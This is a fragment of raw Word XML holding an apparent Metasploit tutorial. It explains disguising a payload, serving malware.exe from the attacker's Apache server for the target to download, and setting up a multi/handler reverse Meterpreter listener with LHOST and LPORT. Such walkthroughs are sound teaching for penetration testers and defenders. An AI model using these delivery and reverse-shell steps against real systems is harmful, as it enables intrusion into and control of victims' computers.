          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One way of sending payloads to targets is to store them into a web server, disguise them as something else and make the users download them. In this example, we are going to store our payload on the Apache server located on the attacker’s machine, and we will reach the file through our target computer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copying the .exe file to /var/www, the same directory as Apache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:jc w:val="center"/>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2543175" cy="257175"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8"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2543175" cy="25717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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, on the target computer, access the executable payload through the attacker’s machine IP </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://[ip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> address]/malware.exe and download the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure the multi/handler module so we can capture the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection when our malicious file gets executed on the victim’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:jc w:val="center"/>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4343400" cy="581025"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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4343400" cy="58102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jc w:val="center"/>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3924300" cy="533400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5"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39243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064">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After this, we set the option LHOST for the attacker’s IP and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the port the victim will connect to on the attacker’s computer. After setting those options, type exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this, Metasploit sets a reverse handler on the chosen </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port, that</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> waits for a payload to call back.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After downloading the executable file on the victim’s machine, and coming back to msfconsole, you’ll be able to see the handler will receive the reverse connection and you’ll be able to see a Meterpreter Session.</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image" Target="media/image11.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.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ve.circl.lu/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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hyperlink" Target="about:blank" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/?type=metasploit" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/?type=metasplo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